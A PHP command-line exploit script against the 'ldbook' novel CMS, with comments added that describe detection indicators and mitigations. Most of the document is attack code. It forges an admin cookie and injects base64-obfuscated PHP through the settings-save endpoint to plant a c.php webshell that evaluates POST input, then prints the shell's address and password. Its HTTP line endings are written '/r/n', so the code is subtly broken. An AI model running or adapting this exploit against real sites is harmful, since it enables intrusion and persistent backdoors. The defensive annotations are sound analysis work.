转至黑防 <?php
/*
 * Command-line proof-of-concept against the "冷迪小说系统" (ldbook) CMS.
 * Kept as an artifact for detection and mitigation review: it shows that the
 * admin settings-save endpoint (admin_man.php?id=save) accepted a
 * client-supplied cookie as proof of admin identity and wrote an unescaped
 * setting value into an executable PHP config file.
 *
 * Usage (from the script's own banner): php exp.php <host> <site path> <admin path>
 *
 * Detection indicators visible in this code:
 *   - POST to <site path><admin path>/admin_man.php?id=save carrying
 *     "Cookie: x_Cookie=admin" and a siteurl value that is URL-encoded PHP
 *     "${...}" syntax containing fopen/fputs/base64_decode;
 *   - the Host header is the literal 127.0.0.1 regardless of the real target;
 *   - a GET to <site path>/config.php immediately followed by a GET to
 *     <site path>/c.php, and a response body containing the marker "huan".
 * Mitigation: authenticate the admin area with server-side sessions (never a
 * cookie flag), and persist settings via var_export()/escaped literals or a
 * non-executable store rather than string-interpolating them into PHP.
 */

// Disables the CLI time limit so the blocking socket reads below are not cut off.
ini_set("max_execution_time",0);

/**
 * Sends the forged settings-save request.
 *
 * @param string $v_hosts  host name or IP; connected on TCP port 80
 * @param string $v_paths  web path of the CMS install (e.g. "/ldbook/")
 * @param string $v_p      admin directory name appended to $v_paths
 *
 * Prints progress to stdout and calls die on failure; no return value.
 */
function post($v_hosts,$v_paths,$v_p) {
    $host = $v_hosts;
    $path = $v_paths;
    $pa = $v_p;
    // Form body of the settings page. Only siteurl is non-trivial: it is
    // URL-encoded PHP "${${...}}" interpolation with two base64 strings (the
    // tool's own success message identifies the resulting file as c.php with
    // password "c"). The other fields mirror the form so the save handler
    // accepts the submission; cmdSave is the GBK-encoded submit button label.
    $data="sitename=&siteurl=%24%7B%24%7Bfputs%28fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5odWFu%29%29%7D%7D&email=&keywords=&flush=6&html=1&reurl=1&link=&tongji=&cmdSave=%C8%B7%C8%CF%D0%DE%B8%C4";
    // Raw HTTP/1.1 request assembled by hand and written to a socket.
    $packet ="POST ".$path.$pa."/admin_man.php?id=save HTTP/1.1/r/n";
    $packet.="Content-Type: application/x-www-form-urlencoded/r/n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n";
    // Host header is hard-coded to 127.0.0.1, not $host — a useful signature.
    $packet.="Host: 127.0.0.1/r/n";
    $packet.="Content-Length: ".strlen($data)."/r/n";
    $packet.="Connection: Keep-Alive/r/n";
    // The only "authentication" sent: a cookie flag the target trusted as admin.
    $packet.="Cookie: x_Cookie=admin;/r/n/r/n";
    $packet.=$data;
    // @ suppresses the connection warning; failure is reported via the if below.
    $o = @fsockopen($host,80);
    if(!$o){
        echo "/n[x] 没有返回,网站有可能访问不了!"; // no response; site may be unreachable
        die;
    }
    fputs($o,$packet);
    $i="[x]等待中."; // "waiting"
    echo $i;
    $b=".";
    // Reads the whole response, appending it to $data (which still holds the
    // request body) and printing a growing dot string as a progress bar.
    while (!feof($o)){
        $data.=fread($o,1024);
        $b.=".";
        echo $b;
    }
    fclose($o);
    // Success heuristic: the save page's response contains "alert".
    $ok=strstr( $data,"alert");
    if( empty($ok)){
        echo "/n[x] 未成功,至于原因嘛,自己找吧!"; // not successful
        die;
    }else{
        echo "/n[O]写入配置成功!/r/n"; // config written
    }
}

/**
 * Triggers the written config and checks whether the backdoor file exists.
 *
 * @param string $g_hosts  host name or IP; connected on TCP port 80
 * @param string $g_paths  web path of the CMS install
 *
 * Two GETs are pipelined on one keep-alive connection: /config.php (so the
 * modified config is included and executed) and then /c.php. Prints the
 * result to stdout and calls die on failure; no return value.
 */
function got($g_hosts,$g_paths) {
    $host1 = $g_hosts;
    $path1 = $g_paths;
    $packet1="GET ".$path1."/config.php HTTP/1.1/r/n";
    $packet1.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n";
    $packet1.="Host: 127.0.0.1/r/n";
    $packet1.="Connection: Keep-Alive/r/n/r/n";
    // Note: unlike post(), a failed fsockopen is not checked here; fputs on
    // false would emit warnings rather than stopping.
    $fg = @fsockopen($host1,80);
    fputs($fg,$packet1);
    $packet2="GET ".$path1."/c.php HTTP/1.1/r/n";
    $packet2.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n";
    $packet2.="Host: 127.0.0.1/r/n";
    $packet2.="Connection: Keep-Alive/r/n/r/n";
    fputs($fg,$packet2);
    $i="[x]写入shell中."; // "writing shell"
    echo $i;
    $b=".";
    // $data1 is never initialised before .= (undefined-variable notice in PHP).
    while(!feof($fg)){
        $data1.=fread($fg,1024);
        $b.=".";
        echo $b;
    }
    // Success heuristic: the marker "huan" appears in the response bodies.
    // That marker is the web-side indicator of compromise for this tool.
    $ok1 = strstr( $data1,"huan");
    if (empty($ok1)){
        echo "/n[x] 没有写入?自己查找原因。"; // not written
        die;
    }else{
        echo "/n[O]试试webshell吧 /r/n[O]地址是http://".$host1."/c.php 密码是 c 。"; // reports shell URL and password
    }
    fclose($fg);
}

// CLI entry: host, site path, admin path are positional arguments.
$hosts = $argv[1];
$paths = $argv[2];
$p = $argv[3];
// empty() also rejects "0" as an argument value.
if(empty($hosts) or empty($paths) or empty($p)){
    // Banner and usage text (tool name, author tag, usage, example).
    print_r(' [x] 冷迪小说系统漏洞利用工具 [x] CODE BY 幻泉(bl4ck) [-] 用法: php exp.php 网站地址 网站路径 后台路径 [-] php exp.php localhost /ldbook/ admin ');
    die;
}
post($hosts,$paths,$p);
got($hosts,$paths);
?>